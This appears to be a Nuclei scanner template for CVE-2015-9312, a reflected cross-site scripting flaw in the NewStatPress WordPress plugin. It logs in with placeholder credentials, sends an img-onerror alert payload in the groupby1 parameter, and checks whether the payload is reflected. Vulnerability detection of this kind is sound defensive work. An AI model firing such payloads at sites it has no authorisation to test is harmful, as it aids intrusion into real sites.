nuclei-templates/cves/2015/CVE-2015-9312.yaml

45 lines
1.6 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2015-9312
info:
name: NewStatPress <= 1.0.4 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The NewStatPress plugin utilizes on lines 28 and 31 of the file includes/nsp_search.php several variables from the $_GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger a Reflected XSS attack.
reference:
- https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054
- https://nvd.nist.gov/vuln/detail/CVE-2015-9312
- https://g0blin.co.uk/g0blin-00057/
- https://wordpress.org/plugins/newstatpress/#developers
remediation: Fixed in version 1.0.6
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-9312
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<img src=x onerror=alert(document.domain)")'
- 'contains(body_2, "newstatpress")'
condition: and